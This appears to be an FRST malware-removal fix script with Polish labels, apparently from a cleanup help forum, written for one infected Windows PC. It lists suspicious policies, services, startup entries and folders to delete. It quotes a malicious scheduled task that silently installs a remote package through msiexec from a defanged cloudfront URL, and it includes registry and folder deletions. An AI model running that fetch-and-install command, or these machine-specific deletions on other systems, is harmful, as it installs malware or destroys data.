CloseProcesses: CreateRestorePoint: HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1 HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia <======= UWAGA GroupPolicy\User: Ograniczenia <======= UWAGA GroupPolicyScripts: Ograniczenia <======= UWAGA HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKU\S-1-5-21-1280168119-2054726452-3514120849-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = S2 Bonjour Service; Brak ImagePath S2 Origin Web Helper Service; Brak ImagePath S3 Sense; "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" [X] S2 SkypeUpdate; Brak ImagePath U3 uxldipod; C:\Users\007marc\AppData\Local\Temp\uxldipod.sys [56584 2017-05-23] (GMER) [Brak podpisu cyfrowego] <==== UWAGA U3 aswbdisk; Brak ImagePath U4 DiagTrack; Brak ImagePath U4 TimeBroker; Brak ImagePath Task: {A15E2711-C513-4908-B7D5-948AEBC71353} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phisokanadaing => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=SamsungXSSDX850XEVOX1TB_S2RFNX0H605538A&d=20170512 /q <==== UWAGA HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A27FE493B52116EED8A5019763B2C6B9" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "3O5H6RIBDJDQQYO" HKU\S-1-5-21-1280168119-2054726452-3514120849-1001\...\StartupApproved\Run: => "D7HWVT7HVLJZMMT" C:\Users\007marc\AppData\Roaming\Songbird2 C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk C:\Users\007marc\Desktop\BD-RE.lnk C:\Users\007marc\Desktop\Ghost Files.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Uninstall.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Windows\Start Menu\Minecraft\Minecraft.lnk C:\Users\007marc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\= INNE =\Skype.lnk C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\User\AppData\Local\Google ] DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google CMD: set CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Paweł\AppData\Local CMD: dir /a C:\Users\Paweł\AppData\LocalLow CMD: dir /a C:\Users\Paweł\AppData\Roaming Hosts: EmptyTemp: